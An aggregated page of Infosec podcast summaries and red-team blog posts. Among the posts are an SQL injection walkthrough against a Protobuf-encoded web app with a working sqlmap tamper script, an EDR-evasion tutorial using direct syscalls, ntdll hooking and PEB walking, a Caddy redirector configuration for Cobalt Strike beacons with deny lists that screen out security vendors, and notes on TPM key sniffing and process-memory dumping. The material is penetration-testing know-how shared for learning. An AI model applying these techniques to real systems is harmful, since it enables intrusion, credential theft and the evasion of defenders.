Normal view

There are new articles available, click to refresh the page.
Before yesterdayPentest/Red Team

How to become a secure coder | Guest Chrys Thorsen

By: Infosec
18 October 2021 at 07:00

On today’s podcast Infosec Skills author Chrys Thorsen talks about founding IT Without Borders, a humanitarian organization built to empower underserved communities through capacity building information and communications technology (ICT) skills and information access. She’s also a consultant and educator. And, for our purpose, she is the author of several learning paths on our Infosec Skills platform. She has written course paths for Writing Secure Code in Android and Writing Secure Code in iOS, as well as a forthcoming CertNexus Cyber Secure Coder path.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
2:43 - Thorsen’s origin story in cybersecurity 
4:53 - Gaining about 40 certifications
6:20 - Cross certification knowledge
7:25 - Great certification combos 
8:45 - How useful are certifications?
11:12 - Collecting certifications
13:01 - Changing training landscape
14:20 - How teaching changed
16:36 - In-demand cybersecurity skills
17:48 - What is secure coding?
19:34 - Secure coders versus coders 
20:31 - Secure coding in iOS versus Android 
22:39 - CertNexus secure coder certification
24:13 - Secure coding before coding 
24:42 - Secure coding curriculum 
26:27 - Recommended studies post secure coding
26:50 - Benefits to skills-based education
27:43 - Tips for lifelong learning
29:29 - Cybersecurity education’s future 
30:54 - IT Without Borders
33:38 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

How to learn web application security | Guest Ted Harrington

By: Infosec
25 October 2021 at 07:00

On today’s podcast, Infosec Skills author Ted Harrington talks about authoring a recent Infosec Skills learning path, “How To Do Application Security Right,” which is also the subtitle of his recent book, “Hackable: How To Do Application Security Right.” Harrington shares his application security expertise, or AppSec, the benefits of skills-based learning, and what it was like to hack the iPhone.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:00 - Hacking the iPhone 
8:30 - IOT security 
14:00 - “Hackable” book 
17:14 - Using the book as a roadmap
18:42 - Most important skills right now
21:45 - Taking Harrington’s class
24:40 - Demystifying application security
26:48 - Career opportunities
28:26 - Roadblocks in application security
30:55 - Education tips for application security
33:40 - Benefits of skills-based education
37:21 - The skills gap and hiring process
41:19 - Tips for lifelong learners
43:43 - Harrington’s next projects
44:33 - Cybersecurity’s education’s future
45:38 - Connect with Harrington 
46:50 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

🇬🇧 Tortellini in Brodobuf

brodobuf

TL;DR

Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between the client and server. In this article we will show you how the serialization can’t stop an attacker if the web application is vulnerable at the root. During our activity the application was vulnerable to SQL injection, we will show how to exploit it in case the communications are serialized with Protocol Buffer and how to write a SQLMap tamper for it.

Introduction

Hello friends… Hello friends… Here is 0blio and MrSaighnal, we didn’t want to leave all the space to our brother last, so we decided to do some hacking. During an activity on a web application we tripped over a weird target behavior, in fact during HTTP interception the data appeared encoded in base64, but after decoding the response, we noticed the data was in a binary format. Thanks to some information leakage (and also by taking a look at the application/grpc header) we understood the application used a Protocol buffer (Protobuf) implementation. Looking over the internet we found poor information regarding Protobuf and its exploitation methodology so we decided to document our analysis process here. The penetration testing activity was under NDA so in order to demonstrate the functionality of Protobuf we developed an exploitable web application (APTortellini copyrighted 😊).

Protobuf primer

Protobuf is a data serialization format released by Google in 2008. Differently from other formats like JSON and XML, Protobuf is not human friendly, due to the fact that data is serialized in a binary format and sometimes encoded in base64. Protobuf is a format developed to improve communication speed when used in conjunction with gRPC (more on that in a moment). This is a data exchange format originally developed for internal use as an open source project (partially under the Apache 2.0 license). Protobuf can be used by application written in various programming languages, such as C#, C++, Go, Objective-C, Javascript, Java etc… Protobuf is used, among other things, in combination with HTTP and RPC (Remote Procedure Calls) for local and remote client-server communication, in particular for the description of the interfaces needed for this purpose. The protocol suite is also defined by the acronym gRPC.

For more information regarding Protobuf our best advice is to read the official documentation.

Step 1 - Playing with Protobuf: Decoding

Okay, so… our application comes with a simple search form that allows searching for products within the database.

brodobuf0

Searching for “tortellini”, we obviously get that the amount is 1337 (badoom tsss):

brodobuf1

Inspecting the traffic with Burp we notice how search queries are sent towards the /search endpoint of the application:

request0

And that the response looks like this:

request1

At first glance, it might seem that the messages are simply base64 encoded. Trying to decode them though we noticed that the traffic is in binary format:

term0

elliot0

Inspecting it with xxd we can get a bit more information.

term1

To make it easier for us to decode base64 and deserialize Protobuf, we wrote this simple script:

#!/usr/bin/python3

import base64
from subprocess import run, PIPE

while 1:
    try:
        decoded_bytes = base64.b64decode(input("Insert string: "))[5:]
        process = run(['protoc', '--decode_raw'], stdout=PIPE, input=decoded_bytes)

        print("\n\033[94mResult:\033[0m")
        print (str(process.stdout.decode("utf-8").strip()))
    except KeyboardInterrupt:
        break

The script takes an encoded string as input, strips away the first 5 padding characters (which Protobuf always prepends), decodes it from base64 and finally uses protoc (Protobuf’s own compiler/decompiler) to deserialize the message.

Running the script with our input data and the returned output data we get the following output:

term2

As we can see, the request message contains two fields:

  • Field 1: String to be searched within the database.
  • Field 2: An integer always equivalent to 0 Instead, the response structure includes a series of messages containing the objects found and their respective amount.

Once we understood the structure of the messages and their content, the challenge is to write a definition file (.proto) that allows us to get the same kind of output.

Step 2 - Suffering with Protobuf: Encoding

After spending some time reading the python documentation and after some trial and error we have rewritten a message definition similar to those that our target application should use.

syntax = "proto2";
package searchAPI;

message Product {

        message Prod {
                required string name = 1;
                optional int32 quantity = 2;
        }

        repeated Prod product = 1;
}

the .proto file can be compiled with the following command:

protoc -I=. --python_out=. ./search.proto

As a result we got a library to be imported in our code to serialize/deserialize our messages which we can see in the import of the script (import search pb2).

#!/usr/bin/python3

import struct
from base64 import b64encode, b64decode
import search_pb2
from subprocess import run, PIPE

def encode(array):
    """
    Function to serialize an array of tuples
    """
    products = search_pb2.Product()
    for tup in array:
        p = products.product.add()
        p.name = str(tup[0])
        p.quantity = int(tup[1])

    serializedString = products.SerializeToString()
    serializedString = b64encode(b'\x00' + struct.pack(">I", len(serializedString)) + serializedString).decode("utf-8")

    return serializedString

test = encode([('tortellini', 0)])
print (test)

The output of the string “tortellini” is the same of our browser request, demonstrating the encoding process worked properly.

term3

Step 3 - Discovering the injection

To discover the SQL injection vulnerability we opted for manual inspection. We decided to send the single quote ‘ in order to induce a server error. Analyzing the web application endpoint:

http://brodostore/search/PAYLOAD

we could guess that the SQL query is something similar to:

SELECT id, product, amount FROM products WHERE product LIKE %PAYLOAD%;

It means that injecting a single quote within the request we could induce the server to process the wrong query:

SELECT id, product, amount FROM products WHERE product LIKE %%;

and then producing a 500 server error. To manually check this we had to serialize our payload with the Protobuf compiler and before sending it encode it in base64. We used the script from step 2 by modifying the following lines:

test = encode([("'", 0)])

after we run the script we can see the following output:

term4

By sending the generated serialized string as payload to the vulnerable endpoint:

request2

the application returns HTTP 500 error indicating the query has been broken,

request3

Since we want to automate the dump process sqlmap was a good candidate for this task because of its tamper scripting features.

Step 4 - Coding the tamper

Right after we understood the behaviour of Protobuf encoding process, coding a sqlmap tamper was a piece of cake.

#!/usr/bin/env python

from lib.core.data import kb
from lib.core.enums import PRIORITY

import base64
import struct
import search_pb2

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # Instantiating objects
        products = search_pb2.Product()
        
        p = products.product.add()
        p.name = payload
        p.quantity = 1

        # Serializing the string
        serializedString = products.SerializeToString()
        serializedString = b'\x00' + struct.pack(">I",len(serializedString)) + serializedString

        # Encoding the serialized string in base64
        b64serialized = base64.b64encode(serializedString).decode("utf-8")
        retVal = b64serialized

    return retVal

To make it work we moved the tamper in the sqlmap tamper directory /usr/share/sqlmap/tamper/ along with the Protobuf compiled library.

Here the logic behind the tamper workings:

logic0

Step 5 - Exploiting Protobuf - Control is an illusion

We intercepted the HTTP request and we added the star to indicate to sqlmap where to inject the code.

GET /search/* HTTP/1.1
Host: brodostore
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

anon0

After we saved the request in the test.txt file, we then run sqlmap with the following command:

sqlmap -r test.txt --tamper brodobug --technique=BT --level=5 --risk=3

sqlmap0

Why is it slow?

Unfortunately sqlmap is not able to understand the Protobuf encoded responses. Because of that we decided to take the path of the Boolean Blind SQL injection. In other words we had to “bruteforce” the value of every character of every string we wanted to dump using the different response the application returns when the SQLi succeeds. This approach is really slow compared to other SQL injection technique, but for this test case it was enough to show the approach to exploit web applications which implement Protobuf. In the future, between one plate of tortellini and another we could decide to implement mechanism that decode the responses via the *.proto struct and then expand it to other attack paths… but for now we are satisfied with that! Until next time folks!

Cybersecurity collaboration, team building and working as CEO | Guest Wendy Thomas

By: Infosec
1 November 2021 at 07:00

On today’s podcast, Secureworks president and CEO Wendy Thomas talks about the company’s drive to provide innovative, best-in-class security solutions that sit at the heart of customers’ security operations. Thomas shares over 25 years of experience in strategic and functional leadership roles, including work as a chief financial officer, chief product officer and VP of strategy. Thomas has worked across multiple technology-driven companies and has a wealth of knowledge.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
3:18 - Wendy’s origin in cybersecurity
5:13 - Climbing the career ladder
8:10 - Average day as CEO
10:38 - Collaboration in cybersecurity
13:07 - Roadblocks in collaboration 
15:03 - Strategies to encourage collaboration
17:53 - Is there collaboration now? 
19:30 - Solving technology security gaps
21:35 - Limiting incident response noise
23:10 - Addressing the skills shortage
25:07 - Women in cybersecurity
30:45 - Developing your team
32:53 - Advice for those entering cybersecurity
34:18 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

This is how I bypassed almost every EDR!

By: Omri Baso
5 November 2021 at 16:58

First of all, let me introduce myself, my name is Omri Baso, I’m 24 years old from Israel and I’m a red teamer and a security researcher, today I will walk you guys through the process of my learning experience about EDRs, and Low-level programming which I have been doing in the last 3 months.

1. Windows API Hooking

One of the major things EDRs are using in order to detect and flag malicious processes on windows, are ntdll.dll API hooking, what does it mean? it means that the injected DLL of the EDR will inject opcodes that will make the program flow of execution be redirected into his own functions, for example when reading a file on windows you will probably use NtReadFile, when your CPU will read the memory of NTDLL.dll and get the NtReadFile function, your CPU will have a little surprise which will tell it to “jump” to another function right as it enters the ntdll original function, then the EDR will analyze what your process is trying to read by inspecting the parameters sent to the NtReadFile function, if valid, the execution flow will go back to the original NtReadFile function.

1.1 Windows API Hooking bypass

First of all, I am sure that there are people smarter than me who invented other techniques, but now I will teach you the one that worked for me.

Direct System Calls:

Direct system calls are basically a way to directly call the windows user-mode APIs using assembly or by accessing a manually loaded ntdll.dll (Manual DLL mapping), In this article, I will NOT be teaching how to manually map a DLL.

The method we are going to use is assembly compiled inside our binary which will act as the windows API.

The windows syscalls are pretty simple, here is a small example of NtCreateFile:

First line: the first line moves into the rax register the syscall number
Second line: moves the rcx register into the r10, since the syscall instruction destroys the rcx register, we use the r10 to save the variables being sent into the syscall function.
Third line: pretty self explanatory, calls the syscall number which is saved at the rax register.
Foruth line: ret, return the execution flow back to the place the syscalls function was called from.

now after we know how to manually invoke system calls, how do we define them in our program? simple, we declare them in a header file.

The example above shows the parameters being passed into the function NtCreateFile when it is called, as you can tell I placed the EXTERN_Csymbol before the function definition in order to tell the linker that the function is found elsewhere.

before compiling our executable we got to make the following steps, right-click on our project and perform the following:

Now enable masm:

Now we must edit our asm Item type to Microsoft Macro Assembler

With all of that out of the way, we include our header file in our main.cpp file and now we can use NtCreateFile directly! amazing, using the action we just did EDRs will not be able to see the actions we do when using the NtCreateFile function we created by using their user-mode hooks!

What if I don’t know how to invoke the NtAPI?

Well… to be honest, I did encounter this, my solution was simple, I did the same thing we just did for NtCreateFile for NtCreateUserProcess — BUT, I hooked the original NtCreateUserProcess using my own hook, and when it was called I redirect the execution flow back to my assembly function with all of the parameters that were generated by CreateProcesW which is pretty well documented and easy to use, therefore I avoided EDRs inspecting what I do when I use the NtCreateUserProcess syscall.

How can I hook APIs myself?

This is pretty simple as well, for that you need to use the following syscalls.

NtReadVirtualMemory, NtWriteVirtualMemory, and NtProtectVirtualMemory, with these syscalls combined we can install hooks into our process silently without the EDR noticing our actions. since I already explained how to Invoke syscalls I will leave you to research a little bit with google on how to identify the right syscall you want to use ;-) — for now, I will just show an example of an x64 bit hook on ntdll.dll!NtReadFile

In the above example we can see the opcodes for mov rax, <Hooking function>; jmp rax.

these opcodes are being written to the start of NtReadFile which means when our program will try to use NtReadFile it will be forced to jump onto our arbitrary function.

It is important to note, since ntdll.dll by default has only read and execute permissions we must also add a write permission to that sections of memory in order to write our hook there.

1.2 Windows API Hooking bypass — making our code portable

In order to maintain our code portable, we must match our code to any Windows OS build… well even though it sounds hard, It is really not that difficult.

In this section, I will show you a POC code to get the Windows OS build number, use that with caution, and improve the code later on after finishing the article and combine everything you learned here(If you finish the article you will have the tools in mind to do so).

The windows build number is stored at the — SOFTWARE\Microsoft\Windows NT\CurrentVersion registry key, using this knowledge we will extract its value from the registry and store it in a static global variable.

after that we need to also create a global static variable that will store the last syscall that was called, this variable will have to be changed each time we call a syscall, this gives us the following code.

In order to dynamically get the syscall number, we need to somehow get it to store itself at the RAX register, for that we will create the following function.

As you can see in the example above, our function has a map dictionary that has a key, value based on the build number, and returns the right syscall number based on the currently running Windows OS build.

But how am I going to store the return value at the RAX dynamically?

Well, usually the return value of every function is stored at the RAX register once it runs, which means if you execute the following assembly code: call GetBuildNumberthe return value of the function will be stored at the RAX register, resulting in our wanted scenario.

BUT wait, it is not that easy, assembly can be annoying sometimes. each time we invoke a function call, from inside another function, the second function will run over the rcx, rdx, r8,r9 registers, resulting in the loss of the parameters that were sent to the first function, therefore we need to store the previous values in the stack, and restore them later on after we finish the GetBuildNumber function, this can be achieved with the following code

As you can see again, we tell the linker that the GetBuildNumber is an external function since it lives within our CPP code.

2. Imported native APIs — PEB and TEB explained.

Well if you think using direct syscalls will solve everything for you, you are a little bit mistaken, EDRs can also see which Native Windows APIs you are using such as GetModuleHandleW, GetProcAddress, and more, In order to overcome this issue we first MUST understand how to use theses functions without using these native APIs directly, here comes to our aid the PEB, the PEB is the Process Environment Block, which is contained inside the TEB, which is the Thread Environment Block, the PEB is always being located at the offset of 0x060 after the TEB (at x64 bit systems).

In the Windows OS, the TEB location is always being stored at the GS register, therefore we can easily find the PEB at the offset location of gs:[60h].

Let us go and follow the following screenshots in order to see in our own eyes how these offsets can be calculated.

this can be inspected using WinDbg using the command dt ntdll!_TEB

As we can see in the following screenshot at the offset of 0x060 we find the PEB structure, going further down our investigation we can find the Ldr in the PEB using the following command dt ntdll!_PEB

In the screenshot above we can see the Ldr is also located at 0x018 offset, the PEB LDR data contains another element that stores information about the loaded DLLs, let’s continue our exploration.

After going down further we see that at the Offset of 0x010 we find the module list (DLL) which will be loaded, using all of that knowledge we can now create a C++ code to get the base address of ntdll WITHOUT using GetModuleHandleW, but first, we must know what we are looking for in that list.

In the screenshot above we can see we are interested in two elements in the _LDR_DATA_TABLE_ENTRY structure, these elements are the BaseDllName, and the DllBase, as we can see the DllBase holds a void Pointer to the Dll base address, and the BaseDllName is a UNICODE_STRING structure, which means in order to read what is in the UNICODE_STRING we will need to access its Buffervalue.

This can also be simply be examined by looking at the UNICODE_STRING typedef at MSDN

Using everything we have learned so far we will create and use the following code in order to obtain a handle on the ntdll — dll.

After we gained a handle on our desired DLL, which is the ntdll.dll we must find the offset of its APIs(NtReadFile and etc.), this can also be achieved by mapping the sections from the DllBase address as an IMAGE, this can be done and achieved using the following code

After we got our functions ready, let’s do a little POC to see that we can actually get a handle on a DLL and find exported functions inside it.

Using the simple program we made above, we can see that we obtained a handle on the ntdll.dll. and found functions inside it successfully!

3. Summing things up

So we learned how to manually get a handle on a loaded module and use its functions, we learned how to hook windows syscalls, and we learned how to actually write our own using assembly.

combining all of our knowledge, we now can practically use everything we want, under the radar, evading the EDR big eyes, even install hooks on ntdll.dll using the PEB without using GetModuleHandleW, and without using any native windows API such as WriteProcessMemory, since we can execute the same actions using our own assembly, I will now leave you guys to modify the hooking code that I showed you before, with our PEB trick that we learned In this article ;-)

And that’s my friends, how I bypassed almost every EDR.

How to become a great cybersecurity leader and manager | Guest Cicero Chimbanda

By: Infosec
8 November 2021 at 08:00

On today’s podcast, Cicero Chimbanda, Infosec Skills author and lecturer, discusses his cybersecurity leadership and management courses. We discuss the many paths of a cybersecurity leadership role, the soft skills that separate a good information security manager from a great one and why a baseline of cybersecurity knowledge can enhance any job, even if you don’t plan to pivot into the industry.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:37 - Getting into cybersecurity 
6:43 - First learning cybersecurity
7:54 - Skills needed to move up 
10:41 - CISM certification
13:00 - Two tracks of technology
15:13 - Are certifications important?
18:50 - Work as a college lecturer 
22:43 - Important cybersecurity soft skills
27:40 - Cybersecurity leadership and management 
32:33 - Where to go after security leadership 
35:26 - Soft skills for cybersecurity managers
37:23 - Benefits to skills-based education
39:40 - Tips for lifelong learning
43:46 - Cybersecurity education’s future
45:21 - Outro  

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

How to become a cyber threat researcher | Guest John Bambenek

By: Infosec
15 November 2021 at 08:00

On today’s podcast, John Bambenek of Netenrich and Bambenek Consulting talks about threat research, intelligence analytics, why the same security problems are so evergreen and the importance of pitching in a little extra bit of your time and talents to make the world a bit better than you found it.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:45 - Getting into cybersecurity 
9:40 - Threat researcher versus security researcher and threat analyst
12:05 - How to get into a research or analyst role
16:32 - Unusual types of malware
19:03 - An ideal work day
23:06 - Current main threat actors
28:50 - What cybersecurity isn’t addressing
31:38 - Where can I volunteer?
36:02 - Skills needed for threat researchers
40:53 - Adjacent careers to threat research
45:11 - Threat research in five years
48:55 - Bambenek Consulting 
49:35 - Learn more about Bambenek
50:26 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

TPM sniffing

15 November 2021 at 13:37
TL;DR: we reproduced Denis Andzakovic’s proof-of-concept showing that it is possible to read and write data from a BitLocker-protected device (for instance, a stolen laptop) by sniffing the TPM key from the LCP bus. Authors: Thomas Dewaele & Julien Oberson Special thanks to Denis Andzakovic for his proof-of-concept and Joe Grand (@joegrand) for his hardware hacking … Continue reading TPM sniffing

How to disrupt ransomware and cybercrime groups | Guest Adam Flatley

By: Infosec
22 November 2021 at 08:00

On today’s podcast, Adam Flatley of Redacted talks about 14 years spent with the NSA and working in global intelligence. He also delineates the process of disrupting ransomware and cybercrime groups by dismantling organizations, putting on pressure and making the crime of ransomware more trouble than it’s worth!

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:13 - Getting into cybersecurity 
4:27 - Why work for the DoD?
6:37 - Average work day in threat intelligence
9:28 - Main security threats today
11:53 - Issues cybersecurity is ignoring
16:12 - Disrupting ransomware offensively 
23:00 - How to handle ransomware 
25:07 - How do I fight cybercriminals 
27:15 - How to convey self learning on a resume
28:24 - Security recommendations for your company 
31:40 - Logistics of changing security 
34:40 - Cybercrime in five years
36:57 - Learn about Redacted
39:18 - Learn more about Adam
40:00 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

🇬🇧 Carrying the Tortellini’s golf sticks

Giving Caddy redirectors some love

tortellinicaddy

The consultant’s life is a difficult one. New business, new setup and sometimes you gotta do everything in a hurry. We are not a top notch security company with a fully automated infra. We are poor, rookies and always learning from the best.

We started by reading several blogposts that can be found on the net, written by people much more experienced than us, realizing that redirectors are almost always based on apache and nginx, which are great solutions! but we wanted to explore other territories…

just to name a few:

and many others…

despite the posts described above that are seriously top notch level, we decided to proceed taking inspiration from our fellow countryman Marcello aka byt3bl33d3r which came to the rescue!

As you can see from his post, Marcello makes available to us mere mortals a quick configuration, which prompted us to want to deepen the argument

Why Caddy Server ?

Caddy was born as an opensource webserver specifically created to be easy to use and safe. it is written in go and runs on almost every platform.

The added value of Caddy is the automatic system that supports the ability to generate and renew certificates automatically through let’s encrypt with basically no effort at all.

Another important factor is the configurative side that is very easy to understand and more minimalist, just what we need!

Let’s Configure!

1

do you remember byt3bl33d3r’s post listed just above ? (Of course, you wrote it 4 lines higher…) let’s take a cue from it!

First of all let’s install Caddy Server with the following commands:

(We are installing it on a AWS EC2 instance)

sudo yum update
yum install yum-plugin-copr
yum copr enable @caddy/caddy
yum install caddy

Once installed, let’s go under /opt and create a folder named /caddy or whatever you like

And inside create the Caddyfile

At this point let’s populate the/caddy with our own Caddyfile and relative folder structure and configurations

To make things clearer, here we have a tree of the structure we are going to implement:

  1. The actual Caddyfile
  2. The filters folder, which will contain our countermeasures and defensive mechanisms ( wtf are you talking about there is a bunch of crap inside here)
  3. the sites folder, which will contain the domains for our red team operation and relative logfiles
  4. the upstreams folder, which will contain the entire upstreams part
  5. the www folder, which will contain the sites if we want to farm a categorization for our domains, like hosting a custom index.html or simply clone an exsiting one because we are terrible individuals.
.
├── Caddyfile
├── filters
│   ├── allow_ips.caddy
│   ├── bad_ips.caddy
│   ├── bad_ua.caddy
│   └── headers_standard.caddy
├── sites
│   ├── cdn.aptortellini.cloud.caddy
│   └── logs
│       └── cdn.aptortellini.cloud.log 
├── upstreams
│   ├── cobalt_proxy_upstreams.caddy
│   └── reverse_proxy
│       └── cobalt.caddy
└── www
    └── cdn.aptortellini.cloud
        └── index.html

CADDYFILE

This is the default configuration file for Caddy

# This are the default ports which instruct caddy to respond where all other configuration are not matched
:80, :443 {
	# Default security headers and custom header to mislead fingerprinting
    header {
        import filters/headers_standard.caddy
    }
	# Just respond "OK" in the body and put the http status code 200 (change this as you desire)
    respond "OK" 200
}

#Import all upstreams configuration files (only with .caddy extension)
import upstreams/*.caddy

#Import all sites configuration files (only with .caddy extension)
import sites/*.caddy

2

We decided to keep the Caddyfile as clean as possible, spending some more time structuring and modulating the .caddy files

FILTERS folder

This folder contain all basic configuration for the web server, for example:

  • list of IP to block
  • list of User Agents (UA) to block
  • default implementation of security headers
bad_ips.caddy
remote_ip mal.ici.ous.ips

Still incomplete but usable list we crafted can be found here: https://github.com/her0ness/av-edr-urls/blob/main/AV-EDR-Netblocks

bad_ua.caddy

This will block all User-Agent we don’t want to visit our domain.

header User-Agent curl*
header User-Agent *bot*

A very well done bad_ua list can be found, for example, here: https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/blob/master/_generator_lists/bad-user-agents.list

headers_standard.caddy
# Add a custom fingerprint signature
Server "Apache/2.4.50 (Unix) OpenSSL/1.1.1d"

X-Robots-Tag "noindex, nofollow, nosnippet, noarchive"
X-Content-Type-Options "nosniff"

# disable FLoC tracking
Permissions-Policy interest-cohort=()

# enable HSTS
Strict-Transport-Security max-age=31536000;

# disable clients from sniffing the media type
X-Content-Type-Options nosniff

# clickjacking protection
X-Frame-Options DENY

# keep referrer data off of HTTP connections
Referrer-Policy no-referrer-when-downgrade

# Do not allow to cache the response
Cache-Control no-cache

We decided to hardly customize the response Server header to mislead any detection based on response headers.

SITES folder

You may see this folder similar to sites-available and sites-enabled in nginx; where you store the whole host configuration.

Example front-end redirector (cdn.aptortellini.cloud.caddy)

From our experience ( false, we are rookies) this file should contain a single host because we have decided to uniquely identify each individual host, but feel free to add as many as you want, You messy!

https://cdn.aptortellini.cloud {

	# Import the proxy upstream for the cobalt beacon
    import cobalt_proxy_upstream

    # Default security headers and custom header to mislead fingerprinting
    header {
            import ../filters/headers_standard.caddy
    }
	
	# Put caddy logs to a specified location
    log {
	    output file sites/logs/cdn.aptortellini.cloud.log
	    format console
	}
		
	# Define the root folder for the content of the website if you want to serve one
	root * www/cdn.aptortellini.cloud
    file_server
}

UPSTREAMS folder

the file contains the entire upstream part, the inner part of the reverse proxy has been voluntarily detached because it often requires individual ad-hoc configurations

cobalt_proxy_upstreams

Handle Directive: Evaluates a group of directives mutually exclusively from other handle blocks at the same level of nesting.

The handle directive is kind of similar to the location directive from nginx config: the first matching handle block will be evaluated. Handle blocks can be nested if needed.

To make things more comprehensive, here we have the sample of http-get block adopted in the Cobalt Strike malleable profile:

3

# Just a fancy name
(cobalt_proxy_upstream) {
    
	# This directive instruct caddy to handle only request which begins with /ms/ (http-get block config pre-defined in the malleable profile for testing purposes)
    handle /ms/* {
       
	    # This is our list of User Agents we want to block
		@ua_denylist {
			import ../filters/bad_ua.caddy
		}

		# This is our list of IPs we want to block
		@ip_denylist {
			import ../filters/bad_ips.caddy
		}

		header {
			import ../filters/headers_standard.caddy
		}

		# Respond 403 to blocked User-Agents
		route @ip_denylist {

             redir https://cultofthepartyparrot.com/ #redir to another site like, for example, an external supplier site which provides services for the company you are targeting ( sneaky move I know..)
        }

		
		# Respond 403 to blocked IPs
		route @ip_denylist {

             redir https://cultofthepartyparrot.com/ #redir to another site like, for example, an external supplier website which provides services for the company you are targeting ( sneaky move I know..) 
        }

	 	# Reverse proxy to our cobalt strike server on port 443 https
    	import reverse_proxy/cobalt.caddy
	}
}

REVERSE PROXY folder

The reverse proxy directly instruct the https stream connection to forward the request to the teamserver if the rules above are respected.

Cobalt Strike redirector to HTTPS endpoint

reverse_proxy https://<cobalt_strike_endpoint> {
    
	# This directive put the original X-Forwarded-for header value in the upstream X-Forwarded-For header, you need to use this configuration for example if you are behind cloudfront in order to obtain the correct external ip of the machine you just compromised
    header_up X-Forwarded-For {http.request.header.X-Forwarded-For}
	
	# Standard reverse proxy upstream headers
	header_up Host {upstream_hostport}
    header_up X-Forwarded-Host {host}
    header_up X-Forwarded-Port {port}
    
	# Caddy will not check for SSL certificate to be valid if we are defining the <cobalt_strike_endpoint> with an ip address instead of a domain
	transport http {
        tls
        tls_insecure_skip_verify
    }
}

WWW

This folder is reserved if you want to put a website in here and manually categorize it

Or..

take a cue from those who do things better than we do:

https://github.com/mdsecactivebreach/Chameleon

Starting Caddy

Once started, caddy will automatically obtain the SSL certificate. Remember to start Caddy in the same folder where you placed your Caddyfile!

sudo caddy start

4

To reload the configuration, you can just run the following command in the root configuration folder of Caddy

sudo caddy reload

Getting a CS Beacon

Everything worked as expected and the beacon is obtained

5

A final thought

This blogpost is just the beginning of a series focused on making infrastructures for offensive security purposes, in the upcoming months we will expand the section with additional components.

With this we just wanted to try something we never tried before, and we know there are multiple ways to expand the configuration or make it even better, so, if you are not satisfied with what we just wrote, feel free to offend us: we won’t take it personally, promise.

How to begin your own cybersecurity consulting business | Guest Kyle McNulty

By: Infosec
29 November 2021 at 08:00

On today’s podcast, Kyle McNulty of Secure Ventures talks about interviewing the people behind the most up-and-coming cybersecurity startups. We discuss the best advice he’s received on the show, how to get your own podcast off the ground and his own security startup, ConsultPlace.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:40 - Getting into cybersecurity
6:00 - McNulty’s education and career
9:50 - Getting into consulting and startups
14:08 - Secure Ventures podcast
17:45 - Best insight from a podcast guest
20:13 - Startup stories 
22:10 - Startups during COVID
23:42 - Advice for startups
25:22 - How to begin a podcast 
33:25 - Tips for cybersecurity newcomers
35:04 - Upcoming podcasts
36:15 - ConsultPlace work 
38:00 - Find more about McNulty
38:42 - Outro

💾

MiniDumpWriteDump via Faultrep!CreateMinidump

8 September 2019 at 21:18

I found out this old undocumented API “CreateMinidumpW” inside the faultrep.dll on Windows XP and Windows Server 2003. This API ends up calling the dbghelp!MiniDumpWriteDump to dump the process by dynamically loading the dbghelp.dll on runtime.

The function takes 3 arguments. I really have no clue what this 3rd argument’s structure is. I passed 0 as the pointer to the structure so by default we end up getting 0x21 as the MINIDUMP_TYPE.

CreateMinidumpW(DWORD dwProcessId, LPCWSTR lpFileName, struct tagSMDumpOptions *)



This is the call stack

dbgcore.dll!_MiniDumpWriteDump@28
